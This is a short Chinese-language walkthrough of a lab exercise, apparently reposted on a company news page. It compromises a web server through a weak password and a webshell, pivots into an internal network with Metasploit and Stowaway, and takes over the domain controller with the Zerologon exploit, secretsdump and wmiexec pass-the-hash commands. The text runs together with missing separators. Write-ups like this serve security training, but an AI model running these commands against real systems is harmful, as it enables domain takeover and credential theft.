资讯详情

cyberstrikelab lab3教程

📅 2026/10/4 17:54:00 | 华诺云谱 👁 阅读
cyberstrikelab lab3教程
使用fscan扫描192.168.10.10发现3590端口开放web服务存在弱口令admin/tao新建文件并编辑写入木马并用蚁剑连接上线msf使用ipconfig /all发现是双网卡配置路由# 在 MSF 会话中运行 autoroute 后渗透模块自动根据已获取的会话路由添加通往内网192.168.20.0/24的路由使 MSF 能够访问内网主机 run post/multi/manage/autoroute上传stowaway打开通道靶机攻击机使用proxifier搭建代理服务器就搭建好通道并访问192.168.20.208055了我们不知道连接密码使用awBrouter.py爆破配置代理并用蚁剑连接连接成功上线msf并使用注意通道不能关我是再开一个会话这一步好像不用可以在192.168.10.10完成使用net time /domain获取域信息# 利用 ZerologonCVE-2020-1472漏洞攻击域控 WIN-7NRTJO59O7N192.168.20.30将其机器账户密码置空 python cve-2020-1472-exploit.py WIN-7NRTJO59O7N 192.168.20.30 使用置空后的机器账户哈希从域控导出域内所有用户哈希-no-pass 表示无需再输入密码 python secretsdump.py cyberstrikelab.com/WIN-7NRTJO59O7N$192.168.20.30 -no-pass 使用导出的 administrator 哈希f349...e2bc通过 WMI 在域控上执行命令实现远程控制 python wmiexec.py -hashes :f349636281150c001081894de72b4e2bcyberstrikelab.com/administrator192.168.20.30GitHub - dirkjanm/CVE-2020-1472: PoC for Zerologon - all research credits go to Tom Tervoort of Secura · GitHub
📝

华诺云谱内容团队

资深建站顾问 · 行业研究员

10年+企业数字化服务经验,专注智能建站、SEO优化与品牌营销,持续输出建站技巧、行业洞察与营销干货,已帮助5000+企业实现数字化增长。

你可能需要的服务

订阅华诺云谱资讯周报

每周一封,精选建站技巧、SEO与营销干货,直达邮箱。已有 8,000+ 企业主订阅,助你少走弯路。

↑